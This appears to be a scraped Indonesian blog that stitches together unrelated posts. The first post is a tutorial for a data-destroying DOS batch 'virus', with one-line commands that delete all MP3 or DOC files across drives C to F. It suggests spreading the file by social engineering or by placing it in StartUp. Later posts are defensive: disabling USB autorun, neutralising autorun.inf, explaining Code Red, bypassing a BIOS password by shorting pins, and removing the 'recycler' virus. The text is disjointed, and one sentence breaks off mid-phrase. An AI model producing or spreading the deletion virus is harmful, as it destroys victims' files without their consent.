Senin, 04 Juni 2012


Sebenarnya saya tidak bergitu tertarik membahas tema yang satu ini. Karena cenderung bersifat merusak. Jadinya, saya tidak akan berpanjang lebar dalam bab ini. Ada banyak cara untuk membuat virus, salah satunya dalam Blog ini adalah dengan DOS. Saya hanya akan memberikan sebuah contoh sangat sederhana dalam pembuatan virus. Efeknya akan menghapus file MP3 yang ada dalam komputer. Sebenarnya saya pernah melihat sebuah virus penghapus MP3 yang dibuat menggunakan Visual Basic, tapi kalau cuma mau menghapus sebuah file, rasanya tidak perlu menggunakan banyak-banyak source code. Bahkan dalam buku ini Anda bisa membuat virus sejenis hanya dengan satu baris perintah pada DOS. Tidak cuma itu, Anda juga bisa mengkreasikannya untuk melakukan aksi delete jenis file lainnya, cuma dengan menggantikan ekstensi file. Anda juga bisa memodifikasi untuk menghapus semua file MP3 dalam seluruh drive atau hanya dalam folder tertentu.


Yang perlu Anda ketikkan dalam DOS adalah:
echo for %%p in (C:\hack) do del *.mp3 %0 %%p:>virusdot.bat


Gambar Virusdos.bat

Maka akan muncul seekor virus yang bernama virus.dot dalam folder yang aktif.

Gambar File target

Untuk menjalankannya, saya serahkan kepada Anda. Apakah mau menggunakan Social Engineering, dipasang di StartUp. Semua itu urusan Anda. Saya hanya mengajari cara membuatnya saja. Sebagai contoh, saya langsung mengaktifkan file virus virusdos.bat tersebut. Perhatikan, sekarang virus itu telah bekerja dengan menghapus semua file MP3 yang ada di dalamnya. Termasuk virus itu sendiri menghilangkan dirinya, untuk menghapus jejak.

Gambar File Target Dihapus


Maaf ya, saya cuma memberikan satu itu saja. Untuk model model lainnya, pelajari sendiri. Khan saya sudah bilang tidak begitu tertarik dengan bab ini. Sebagai sedikit bonus, apabila Anda berniat memodifikasi supaya
virus tersebut dapat menghapus dalam semua drive, bentuk syntax-nya adalah:
 echo for %%p in (C D E F) do del *.mp3 %0 %%p:>virusdot.bat

Nanti, virus akan menyusup ke drive C, D, E, dan F untuk menghapus file MP3. Sekarang apabila berniat jenis file tertentu, katakanlah file dokumen (DOC), syntax-nya menjadi:
echo for %%p in (C D E F) do del *.doc %0 %%p:>virusdot.bat

Yah, pokoknya pintar-pintar Anda-lah. Saya agak



Dengan penggunaan flashdisk yang sudah umum dimana-mana, menjadi salah satu sebab menjamurnya virus, terutama virus lokal. Ini terlihat sejak masa jayanya virus brontok. Sampai saat ini, saya sering sekali melihat hampir setiap komputer/laptop teman-teman di perkantoran terkena virus, yang terkadang mereka tidak menyadari. Selain Antivirus yang seharusnya senantiasa diupdate minimal seminggu sekali, sebenarnya ada tips yang sangat bermanfaat untuk mencegah menularnya virus dari media seperti flashdisk tanpa kita sadari. Berikut langkah-langkahnya :
1.Buka Registry Editor, dengan cara klik Start Menu > Run dan ketik regedit dan klik OK

2. Cari Lokasi :

      KEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

3. Buat key baru ( Klik kanan > New > DWORD Value ) beri nama : NoDriveAutoRun

4.Double klik untuk mengisi nilai ( data ). Pilih Base : Decimal dan isikan Value data dengan nilai 67108863

5.Jika diperlukan, dapat juga menambahkan nilai yang sama di

  HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer

6. Restart Komputer

Dengan penambahan setting ini, maka ketika kita memasang flashdisk, windows tidak akan otomatis menjalankan program autorun yang ada di flashdisk. Untuk lebih jelasnya, artikel ini dapat dicari/dibaca di tutorial Windows Registry Guides. Download.





Tentunya teman2 semuanya sudah mengetahui bhw virus2 dapat menularkan dirinya ke komputer2 lain dengan media flashdisk. -.-“. Kesal? Sudah pasti! Saya juga merasakan perasaan yang sama ketika komputer saya juga ikut2an kena virus… tapi saya punya cara yang ampuh agar virus yang ada di flashdisk tersebut tidak dapat menularkan dirinya ke komputer lain..

Baiklah saya akan mulai membahasnya sekarang, diawali dengan cara penularan virus lewat media flashdisk. Sebenarnya sangat simple, ketika flashdisk dicolokan kedalam port usb virus yang sedang berjalan tinggal men-copy dirinya sendiri ke dalam flashdisk, dan tidak lupa pula dengan membuat file “autorun.inf” yang letak file-nya kasat mata sehingga tidak dapat dilihat. nah… file inilah yang akan kita edit agar virusnya tidak dapat menjalankan dirinya di komputer kita.

Cara yang pertama dengan mengedit secara manual dengan menggunakan notepad atau wordpad. Diasumsikan flashdisk kita yang telah dicolokan kedalam komputer (yang telah terinfeksi) beralamat “F:\”, maka saya akan mencoba membuka file “F:\autorun.inf” lalu enter. Lalu notepad akan terbuka secara otomatis dengan beberapa mantra didalamnya, setelah itu kita tinggal mengedit mantra tersebut dengan memblock semua mantra tersebut(ctrl+a) lalu hapus(backspace atau del) lalu anda bisa membiarkannya kosong lalu tekan ctrl+s untuk men-savenya. Anda juga bisa menuliskan beberapa puisi indah tentang perdamaian didalamnya ^-^.

Tetapi bang blckflcn, bagaimana jika file tersebut memiliki attribute “read-only”? yang jelas kita tidak dapat mengeditnya secara manual!(aaaaarrrrrgh!!!!). Lalu? Apa yang dapat kita lakukan… bang blckflcn? Gigi dibalas dengan gigi, mata dibalas dengan mata, dan yah… anda benar! MANTRA juga DIBALAS DENGAN MANTRA!! Mantranya sangatlah mudah… saya akan membahasnya secara bertahap sekarang juga :

  1. buka aplikasi notepad (tempat dimana kita akan menulis mantra)
  2. tuliskan mantra “del /a:r f:\autorun.inf” (tnp tanda petik) lalu enter.
  3. langkah selajutnya adalah tulis mantra lagi! Mantranya “echo ‘terserah tulisan apa’ >f:\autorun.inf&attrib +r f:\autorun.inf” (tnp tanda petik juga).
  4. lalu save file mantra tersebut dengan nama file terserah anda dan path-nya terserah anda juga, tetapi extension-nya harus “.bat”(harus tidak boleh tidak)
  5. lalu jalankan file mantra yang baru kita buat tersebut
  6. buka explorer
  7. pada bagian address tuliskan “F:\autorun.inf”, lalu tekan enter sambil mengucapkan “sim…salabim…”. Maka aplikasi notepad akan muncul lagi sambil menampilkan beberapa tulisan, tetapi yang ini jelas bukan mantra ^-^.


 Setelah beberapa step tadi, virus tidak dapat menjalankan dirinya di komputer lain ketika kita mencolokan flashdisk kita kedalam port usb-nya. Tetapi bang blckflcn, virus2 dari komputer yang terinfeksi tersebut masih ada di dalam flashdisk saya. Bagaimana ini? Yah, itu sih bukan tugas saya lagi. Itu sih sudah menjadi tugas anti-virus… saya hanya memberitahukan cara agar virusnya tidak berjalan ketika flashdisk kita dicolokan kedalam port usb pada komputer yang lain… lagian mantra yang saya punya masih belum begitu ampuh untuk membuat virus tidak berjalan di komputer. Oleh karena itu, saya akan belajar tentang mantra2 tersebut di hogwarts agar lebih ampuh. Hehehe… ^-^.
 Okeh… sekian saja info2 dan mantra2 yang saya jabarkan. (krn sdh tidak tahu lagi harus menjabarkan mantra yang mana ^-^)
Pertanyaannya adalah – seberapa jauh effek serangan ini kepada Internet di Indonesia? Jawaban singkatnya adalah – karena sebagian besar sekali komunitas Internet di Indonesia hanyalah pengguna Internet biasa; maka serangan virus code red praktis tidak terlalu terasa di Indonesia.

Apakah itu virus code red worm? Code red worm termasuk serangan yang mengeksploitasi buffer overrun di software Web server. Penyerang yang berhasil mengeksplotasi kelemahan Web server ini akan bisa mengambil alih kontrol Web server yang di serangnya. Dengan cara ini, seorang penyerang dapat melakukan banyak hal, seperti mengganti halaman Web, memformat harddisk, menambahkan user baru ke group administrator lokal. Serangan ini hanya bisa terjadi jika ada komponen tertentu yang lemah yang ada di Server tersebut.

Dalam kasus code red worm, komponen tersebut adalah index servis. Lebih jelasnya virus code red worm kebetulan menyerang Web server yang di jalankan di Windows NT 4.0 atau Windows 2000; lebih spesifik-nya yang di serang oleh virus ini adalah Microsoft Index Server 2.0, Indexing Service di Windows 2000 & Windows XP beta yang merupakan bagian dari perangkat Microsoft IIS 4.0 & 5.0. Index Server 2.0 & Indexing Service adalah mesin pencari & pengindex full-text untuk digunakan dengan Windows NT 4.0 dan Windows 2000. Mesin pencari ini memungkinkan pengguna dengan Web browser mencari dokumen dengan cara memasukan keyword, kata-kata atau properti dokumen.

Spesifik program yang bermasalah / di serang adalah idq.dll yang merupakan bagian dari ISAPI (Internet Services Application Programming Interface) yang merupakan teknologi yang memungkinkan develoer Web mengembangkan fungsi dari IIS server. Kesalahan yang terjadi di idq.dll adalah adanya buffer yang tidak di check pada program yang menangani permintaan yang masuk. Akibatnya, jika ada permintaan yang tidak baik masuk, masalah buffer overrun akan terjadi, dengan dua (2) hasil utama:

  • Jika permohonan ke idq.dll hanya berisi ramdom data, hal ini hanya akan menyebabkan server gagal bekerja saja. Jika IIS 4.0 digunakan, administrator cukup me-restart sistem saja. Jika IIS 5.0 digunakan maka Web server akan merestart diri sendiri.
  • Jika permohonan idq.dll berisi perintah khusus yang dapat dijalankan di server. Si penyerang dapat menjalankan program dengan kekuasaan sebagai sistem administrator. Hal ini memungkinkan penyerang halaman web, konfigurasi ulang server dan menjalankan perintah sistem operasi lainnya.

Kelemahan ini dapat di eksploitasi jika sebuah hubungan komunikasi Web terjadi dengan server yang di serang. Bagi Server yang menggunakan Index Server / Index Servis yang bukan dari IIS tidak mempunyai masalah dengan red code worm. Contohnya pengguna Windows 2000 Profesional. Serangan juga tidak bisa terjadi jika script mapping untuk Internet Data Administration (.ida) dan Internet Data Query (.idq) tidak ada. Prosedur untuk menghilangkan mapping ini di jelaskan di IIS 4.0 & IIS 5.0 security checklist. Kebetulan mapping ini dapat dihilangkan secara automatis melalui High Security Template (IIS) atau Windows 2000 Internet Server Security Tool.

Patch (perbaikan) agar Index Servis tidak lagi menderita serangan dari code red worm dapat di ambil untuk Windows NT 4.0 di http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833 sedangkan untuk Windows 2000 Professional, Server & Advanced Server di http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800.

Sedangkan verifikasi instalasi perbaikan dapat dilihat dengan mudah melalui editor registry Windows, pada Windows NT 4.0 kunci registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Hotfix\Q300972. Sedang untuk Windows2000 dapat dilihat adanya registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows2000\SP3\Q300972. Untuk memverifikasi masing-masing file, gunakan tanggal/waktu dan informasi versi yang diberikan pada kunci registry berikut HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows2000\SP3\Q300972\Filelist.
Beberapa Componet dapat di tambahkan pada VS2010 terutama  penambahan Tool untuk Pemograman VB,C#,WPF,Dan ASP.net diantaranya ada di bawah ini :


1. Devexpress Vol 2



     Download

2. Componetone


3. .Infragistics netadvantage





4. Telirik


Teman saya ada yang pernah meminta tolong untuk membukakan password bios pada laptop Satellite A135-S2276 (PSAD6U). Katanya laptopnya rusak gara-gara di pakai oleh adiknya. pertamatama saya coba masuk kedalam biosnya ternya biosnya pun sama masih tidak dapat di buka karena saya tidak mengerti . Langsung saya nyalakan komputer dan internet. 

Langkah pertama yg bisa saya lakukan adalah Googling…, karena google adalah tempat bertanya yang jujur. Dari beberapa forum yang berkenaan dengan masalah ini disebutkan memang terdapat bug pada versi awal BIOS Toshiba Satellite A135 dan beberapa produk laptop toshiba lainnya yang bisa mengakibatkan kesalahan ini sehingga password akan diaktifkan pada EEPROM2 dalam kondisi tertentu (misalnya ketika power dalam batere telah benar-benar habis). Ini persis seperti kasus yang dialami adik saya. Disebutkan pula solusinya adalah melakukan update versi BIOS terakhir yaitu v1.60 - 22/Des/2008. Saya berpikir bagaimana cara melakukan update dengan kondisi laptop terproteksi password…? Solusi 5: Short Pin JOPEN1 ( BERHASIL ): Akhirnya saya menemukan solusi untuk memperbaikinya pertama lepas batere laptop, memory. lalu hubungkan JOPEN1(U) dengan…. JOPEN1(T).amati pada JOPEN1 ternyata ada dua jalur yang tidak saling terhubung. Dua jalur ini menyerupai huruf T dan U yang saling bertumpuk dengan posisi T berada di atas U.




hubungkan JOPEN 1 Yg berbentuk Huruf T dan U


Karena jaraknya yang terlalu dekat dan sangat kecil, rasanya tidak mungkin bisa mengandalkan pinset atau peniti. Akhirnya saya memutuskan untuk menggunakan Obeng minus berukuran kecil. Saya hubungkan kedua pin ini (T dan U) selama kurang lebih 45 detik. Lalu saya pasang kembali seperti semula dan menyalakan laptop lagi. Akhirnya kami bisa bernafas lega karena tampilan BIOS langsung muncul tanpa pertanyaan password lagi.

Minggu, 05 Juni 2011

Virus recycle merupakan virus yang menyerupai recyclebin,cara mengetahui bagaimana computer anda terinfeksi virus recycle anda bisa lihat di windows explorer apakah ada di dalamnya folder bernama recycled bila ada berarti computer anda sedang terinfeksi virus recycle.”bagaimana cara menghapus virus recycle??” banyak cara untuk menghabisi virus recycle, cara2nya ada seperti di bawah ini :
1. Menggunakan ANTIVIRUS
Ada beberapa antivirus yang bisa menditeksi serta menghabisi virus recycle diantaranya ada di bawah ini tapi dengan catatan bahwa antivirus di bwah ini mesti sering di update,di antaranya!!!
1. Kaspersky 7
2. Eset nod 32 v
3. AVG smart security 2011
4. Avast 6
2. Menggunakan NOTEPAD
Mengapa antivirus yang tidak bisa menghabisi recycle malah menghapus atau menganggap NOTEPAD.EXE di System 32 Windows adalah virus? Itu akibat pengaruh dari virus recycle yang sudah menyebar di system windows anda,saya akui pembuat virus ini sangat lah ahli dalam membuat virus sampai 2 saya menggunakan UBUNTU untuk sementara waktu dikarenakan virus tersebut,, nah bila gan-gan sekalian sudah tidak bisa menggunakan NOTEPAD maka gan2 bisa menggunakan software NP++(notepad++) yang fungsinya hampir sama dengan notepad caranya ketikan di notepad seperti ini!!!
attrib –s –h –r /s /d f:\*.*
rmdir /s /q e:\recycler
del /s /f e:\recycler
catatan:
Untuk e:\recycler awalnya adalah c:\recycler. Saat saya periksa, ternyata di partisi ‘e’ juga ada. Akhirnya saya buat juga e:\recycler. Jadi, sesuaikan dengan keperluan masing-masing.dan yang ini hanya untuk menghapus file foldernya sajapada umumnya folder itu tidak bisa dihapus dengan 2 kemungkinan:

1. virus yang ada di dalamnya sedang aktif dalam memory
2. virus yang aktif dalam memory melakukan rewrite folder tadi, jadi meskipu dihapus

akan tetap muncul tapi cara mas efektif bila virusnya tidak terjangkit ke komputer. tambahan, pastikan untuk mengganti nama drivenya: “attrib –s –h –r /s /d f:\*.*” -> f:\ itu merupakan nama drive, jadi tergantung mau hapus yang di drive manaSimpan file tersebut dalam bentuk ekstensi .bat (save as type gunakan all files)

3.menggunakan SAVE MODE dan run->CMD
1.Restart komputer anda, dan masuk dengan save mode (Tekan F8 pada saat booting). Hapus direktori di dalam c\recycle (Shift Del)
2.Yakinkan virus recycler sudah hilang dari komputer anda, dengan cara restart kembali dan jalankan windows dengan normal. Cek kembali di folder tadi apakah masih ada folder recycler
3.Setelah yakin bersih, lakukan hal yang sama pada drive lain termasuk USB.
4.Instal antivirus, yang sudah di bahas di atas
5.untuk menghapus autorun-nya, klick start->run lalu ketik cmd dan enter, kemudian pilihlah drive C:\ kemudian ketik cd\ untuk berada pada root
6.Nah pada root directory ini, hapuslah file yang bernama autorun.inf, biasanya beratribut super hidden, caranya ketik attrib -r -s -h +a *.inf lalu hapusnya autorun.inf(del autorun.inf)
7.Kemudian ketik attrib -r -s -h +a recycler lalu hapus semua isi folder recycler(cd recycler -> del *.* ->Y -> cd..) kemudian hapus folder recycler(rmdir recycler).
8. Ulangi langkah 2 ke semua drive pada komputermu termasuk usb flasdisk yang sangat rentan terhadap virus recycle ini.